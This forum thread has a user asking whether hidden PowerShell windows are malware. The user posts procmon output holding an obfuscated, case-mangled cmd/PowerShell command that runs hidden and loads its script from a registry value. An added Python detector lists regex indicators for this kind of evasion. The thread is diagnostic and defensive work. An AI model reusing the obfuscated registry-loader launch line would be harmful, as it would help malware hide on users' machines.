
POWERSHELL STARTS BY ITSELF

Anonymous
2022-08-30T10:03:52+00:00

POWERSHELL suddenly starts on its own and opens several windows out of view; using procmon64 I obtained the following data:

EVENT

0 ntoskrnl.exe ObReferenceObjectByHandle + 0x1ece 0xfffff8033cf2cc7e C:\Windows\system32\ntoskrnl.exe

1 ntoskrnl.exe SeQueryInformationToken + 0x288f 0xfffff8033cf4d72f C:\Windows\system32\ntoskrnl.exe

2 ntoskrnl.exe ObWaitForMultipleObjects + 0x11f1 0xfffff8033cf2a161 C:\Windows\system32\ntoskrnl.exe

3 ntoskrnl.exe ObOpenObjectByNameEx + 0x1dd 0xfffff8033cf3fe3d C:\Windows\system32\ntoskrnl.exe

4 ntoskrnl.exe NtQuerySystemInformation + 0x3a4d 0xfffff8033cf3fb1d C:\Windows\system32\ntoskrnl.exe

5 ntoskrnl.exe FsRtlFreeExtraCreateParameter + 0x3af 0xfffff8033cf3c06f C:\Windows\system32\ntoskrnl.exe

6 ntoskrnl.exe setjmpex + 0x8933 0xfffff8033cbe2683 C:\Windows\system32\ntoskrnl.exe

7 ntdll.dll ZwOpenKeyEx + 0x14 0x7fff167282b4 C:\Windows\SYSTEM32\ntdll.dll

8 KERNELBASE.dll MapPredefinedHandleInternal + 0xabc 0x7fff133b2c6c C:\Windows\System32\KERNELBASE.dll

9 KERNELBASE.dll RegOpenKeyExInternalW + 0x13b 0x7fff133b1ddb C:\Windows\System32\KERNELBASE.dll

10 KERNELBASE.dll RegOpenKeyExW + 0x19 0x7fff133b1c89 C:\Windows\System32\KERNELBASE.dll

11 profapi.dll profapi.dll + 0x303d 0x7fff12af303d C:\Windows\System32\profapi.dll

12 profapi.dll profapi.dll + 0x2ad0 0x7fff12af2ad0 C:\Windows\System32\profapi.dll

13 profapi.dll profapi.dll + 0x1a2f 0x7fff12af1a2f C:\Windows\System32\profapi.dll

14 UBPM.dll UbpmTriggerConsumerRegister + 0x53e5 0x7fff0fec9b85 c:\windows\system32\UBPM.dll

15 UBPM.dll UbpmTriggerConsumerRegister + 0x9904 0x7fff0fece0a4 c:\windows\system32\UBPM.dll

16 UBPM.dll UbpmTriggerConsumerRegister + 0x6ffc 0x7fff0fecb79c c:\windows\system32\UBPM.dll

17 UBPM.dll UbpmTriggerConsumerRegister + 0x75c5 0x7fff0fecbd65 c:\windows\system32\UBPM.dll

18 UBPM.dll UbpmTriggerConsumerRegister + 0x7ec5 0x7fff0fecc665 c:\windows\system32\UBPM.dll

19 UBPM.dll UbpmTriggerConsumerRegister + 0x8835 0x7fff0feccfd5 c:\windows\system32\UBPM.dll

20 UBPM.dll UbpmTriggerConsumerRegister + 0x82d4 0x7fff0fecca74 c:\windows\system32\UBPM.dll

21 UBPM.dll UbpmTriggerConsumerSetDisabledForUser + 0x502 0x7fff0fed3652 c:\windows\system32\UBPM.dll

22 EventAggregation.dll EACreateAggregateEvent + 0x1bce 0x7fff129a3fae c:\windows\system32\EventAggregation.dll

23 EventAggregation.dll EACreateAggregateEvent + 0x1ac1 0x7fff129a3ea1 c:\windows\system32\EventAggregation.dll

24 EventAggregation.dll EACreateAggregateEvent + 0x12e9 0x7fff129a36c9 c:\windows\system32\EventAggregation.dll

25 EventAggregation.dll EACreateAggregateEvent + 0xf4f 0x7fff129a332f c:\windows\system32\EventAggregation.dll

26 EventAggregation.dll EACreateAggregateEvent + 0xa48 0x7fff129a2e28 c:\windows\system32\EventAggregation.dll

27 ntdll.dll TpWaitForWait + 0x805 0x7fff166d3495 C:\Windows\SYSTEM32\ntdll.dll

28 ntdll.dll TpWaitForWait + 0x50d 0x7fff166d319d C:\Windows\SYSTEM32\ntdll.dll

29 ntdll.dll TpWaitForWait + 0x370 0x7fff166d3000 C:\Windows\SYSTEM32\ntdll.dll

30 ntdll.dll TpSetWait + 0x190 0x7fff166cf410 C:\Windows\SYSTEM32\ntdll.dll

31 ntdll.dll RtlReleaseSRWLockExclusive + 0x1c93 0x7fff166b3703 C:\Windows\SYSTEM32\ntdll.dll

32 KERNEL32.DLL BaseThreadInitThunk + 0x14 0x7fff147b8364 C:\Windows\System32\KERNEL32.DLL

33 ntdll.dll RtlUserThreadStart + 0x21 0x7fff166e7091 C:\Windows\SYSTEM32\ntdll.dll

PROCESS

Description: Processore dei comandi di Windows

Company: Microsoft Corporation

Name: cmd.exe

Version: 10.0.14393.0 (rs1_release.160715-1616)

Path: C:\Windows\system32\cmd.exe

Command Line: cmd.exe /c Echo IEX "icM ([SCRiPTBLOck]::CrEAtE([stRING]::JOin('', ((gET-ITEmPRopErty -pATh 'hKLM:\SOFtWArE\pIRiForMlwZ7L').'Lwz7l6w' | % { chAR }))))" | POwERshElL -wINdowstyle hidDeN

PID: 8336

Parent PID: 1124

Session ID: 1

User: PAOLO

Auth ID: 00000000:0002260f

Architecture: 64-bit

Virtualized: False

Integrity: Etichetta obbligatoria\Livello obbligatorio alto

Started: 30/08/2022 10:59:46

Ended: (Running)

Modules:

cmd.exe 0x7ff7b4780000 0x59000 C:\Windows\System32\cmd.exe Microsoft Corporation 10.0.14393.0 (rs1_release.160715-1616) 16/07/2016 04:23:21

KernelBase.dll 0x7fff13390000 0x21d000 C:\Windows\System32\KernelBase.dll Microsoft Corporation 10.0.14393.2097 (rs1_release_1.180212-1105) 30/03/2018 05:22:08

msvcrt.dll 0x7fff14520000 0x9e000 C:\Windows\System32\msvcrt.dll Microsoft Corporation 7.0.14393.0 (rs1_release.160715-1616) 16/07/2016 04:26:15

kernel32.dll 0x7fff147b0000 0xac000 C:\Windows\System32\kernel32.dll Microsoft Corporation 10.0.14393.2097 (rs1_release_1.180212-1105) 30/03/2018 05:32:56

ntdll.dll 0x7fff16680000 0x1d2000 C:\Windows\System32\ntdll.dll Microsoft Corporation 10.0.14393.1715 (rs1_release_inmarket.170906-1810) 07/09/2017 06:51:10

STACK

0 FLTMGR.SYS FltDecodeParameters + 0x195a 0xfffff805c1a646ca C:\Windows\System32\drivers\FLTMGR.SYS

1 FLTMGR.SYS FltDecodeParameters + 0x1508 0xfffff805c1a64278 C:\Windows\System32\drivers\FLTMGR.SYS

2 FLTMGR.SYS FltDecodeParameters + 0x616 0xfffff805c1a63386 C:\Windows\System32\drivers\FLTMGR.SYS

3 FLTMGR.SYS FltDecodeParameters + 0x3be 0xfffff805c1a6312e C:\Windows\System32\drivers\FLTMGR.SYS

4 ntoskrnl.exe NtQueryInformationFile + 0xc20 0xfffff8033cf563a0 C:\Windows\system32\ntoskrnl.exe

5 ntoskrnl.exe NtQueryDirectoryFile + 0xcf 0xfffff8033cf581df C:\Windows\system32\ntoskrnl.exe

6 ntoskrnl.exe setjmpex + 0x8933 0xfffff8033cbe2683 C:\Windows\system32\ntoskrnl.exe

7 ntdll.dll ZwQueryDirectoryFile + 0x14 0x7fff16726744 C:\Windows\System32\ntdll.dll

8 KernelBase.dll FindFirstFileExW + 0x40c 0x7fff133b86fc C:\Windows\System32\KernelBase.dll

9 cmd.exe cmd.exe + 0x599a 0x7ff7b478599a C:\Windows\System32\cmd.exe

10 cmd.exe cmd.exe + 0x76e8 0x7ff7b47876e8 C:\Windows\System32\cmd.exe

11 cmd.exe cmd.exe + 0xd9ad 0x7ff7b478d9ad C:\Windows\System32\cmd.exe

12 cmd.exe cmd.exe + 0xc3cd 0x7ff7b478c3cd C:\Windows\System32\cmd.exe

13 cmd.exe cmd.exe + 0x4917 0x7ff7b4784917 C:\Windows\System32\cmd.exe

14 cmd.exe cmd.exe + 0xc378 0x7ff7b478c378 C:\Windows\System32\cmd.exe

15 cmd.exe cmd.exe + 0xf916 0x7ff7b478f916 C:\Windows\System32\cmd.exe

16 cmd.exe cmd.exe + 0x1510d 0x7ff7b479510d C:\Windows\System32\cmd.exe

17 kernel32.dll BaseThreadInitThunk + 0x14 0x7fff147b8364 C:\Windows\System32\kernel32.dll

18 ntdll.dll RtlUserThreadStart + 0x21 0x7fff166e7091 C:\Windows\System32\ntdll.dll

to close the 5 or 6 cmd.exe processes that stay open until I close them one by one through Task Manager

I would like to know what is going on: whether it is a normal process I can leave running, whether I am right to close them, or whether it is one of the new "viruses" like ASTAROTH or similar that common antivirus products cannot identify.

I should say up front that I am not a PC wizard, just an amateur.

Thanks for your interest.
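The command line captured by procmon above is shaped for evasion rather than for a human operator: every keyword is case-mangled, `-windowstyle` is spelled in mixed case and could equally be abbreviated, the script body is pulled out of a registry value at run time and reassembled from characters, and the text is echoed into PowerShell's standard input instead of being passed with `-Command`. A defender who wants to flag launches of this shape in process-creation telemetry (Sysmon event ID 1 or Security event 4688 with command-line auditing enabled) can normalize the command line and count such indicators. The script below is an added example written for this page; it is not code from the post, from Microsoft or from any product. The indicator names, the alert threshold and the three benign sample lines are constructed; the first sample line is the command line quoted in the post.

```python
import re

# Indicators of PowerShell launch obfuscation, modelled on the cmd.exe command
# line quoted in the post. Each one alone has benign uses; the combination is
# the signal. Indicator names and the threshold are constructed for this example.


def prefix_pattern(word: str, min_len: int) -> str:
    """Regex source matching any prefix of `word` at least `min_len` characters
    long (e.g. -w, -win, -windowstyle): powershell.exe accepts unambiguous
    abbreviations of its parameter names, so a detector has to as well."""
    head, tail = word[:min_len], word[min_len:]
    optional = ""
    for ch in reversed(tail):
        optional = f"(?:{re.escape(ch)}{optional})?"
    return re.escape(head) + optional


# Patterns are matched against a lower-cased command line, so no re.I is needed.
INDICATORS = {
    # Invoke-Expression or its alias, which runs a string as code.
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b"),
    # -WindowStyle Hidden, including abbreviated spellings such as "-w h".
    "hidden-window": re.compile(
        "-" + prefix_pattern("windowstyle", 1) + r"\s+" + prefix_pattern("hidden", 1) + r"\b"
    ),
    # Script body compiled at run time instead of appearing on the command line.
    "scriptblock-create": re.compile(r"\[\s*scriptblock\s*\]\s*::\s*create"),
    # Payload read from a registry value (Get-ItemProperty / gp on an HKLM or HKCU path).
    "registry-payload": re.compile(
        r"\b(?:get-itemproperty|get-itempropertyvalue|gp|gpv)\b[^|]*\bhk(?:lm|cu)\s*:"
    ),
    # Characters or bytes reassembled into a string with [char] / [string]::Join.
    "char-join": re.compile(r"\[\s*string\s*\]\s*::\s*join\b|\bchar\b"),
    # Script text piped into powershell's stdin rather than passed as -Command.
    "piped-into-powershell": re.compile(r"""\|\s*["']?(?:[\w:\\]*\\)?powershell(?:\.exe)?\b"""),
}

# Number of distinct indicators at which a command line is reported.
ALERT_THRESHOLD = 3


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace so case-mangled spellings compare like plain ones."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def match_indicators(cmdline: str) -> list:
    """Names of every indicator present in the command line, in table order."""
    norm = normalize(cmdline)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def is_suspicious(cmdline: str) -> bool:
    """True when the command line reaches the alert threshold."""
    return len(match_indicators(cmdline)) >= ALERT_THRESHOLD


def scan(cmdlines: list) -> list:
    """(command line, indicators) for each line at or above the threshold."""
    hits = []
    for line in cmdlines:
        found = match_indicators(line)
        if len(found) >= ALERT_THRESHOLD:
            hits.append((line, found))
    return hits


# Constructed sample process-creation command lines: the first is the one quoted
# in the post, the other three are benign lines written for this example.
SAMPLE_CMDLINES = [
    r'''cmd.exe /c Echo IEX "icM ([SCRiPTBLOck]::CrEAtE([stRING]::JOin('', ((gET-ITEmPRopErty -pATh 'hKLM:\SOFtWArE\pIRiForMlwZ7L').'Lwz7l6w' | % { chAR }))))" | POwERshElL -wINdowstyle hidDeN''',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"powershell -w hidden -File C:\scripts\cleanup.ps1",
    r"cmd.exe /c dir C:\Users",
]

if __name__ == "__main__":
    for line, found in scan(SAMPLE_CMDLINES):
        print(f"ALERT ({len(found)} indicators: {', '.join(found)}): {line[:80]}...")
```

Run against the four samples, only the command line from the post is reported (all six indicators fire); the benign hidden-window launch of a script file matches a single indicator and stays below the threshold, which is the point of counting a combination rather than alerting on any one keyword. Whether the registry key named in the post belongs to a legitimately installed program is a separate question that the telemetry alone does not answer, which is why the follow-up about installed software in the answers below matters.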


2 answers

  1. Spigolo 135.3K reputation points Volunteer Moderator
    2022-08-30T10:28:46+00:00

  2. Anonymous
    2022-08-30T10:27:58+00:00

    Hi PAOLO GUALDI

    Are you using CCleaner?

    Have a nice day!
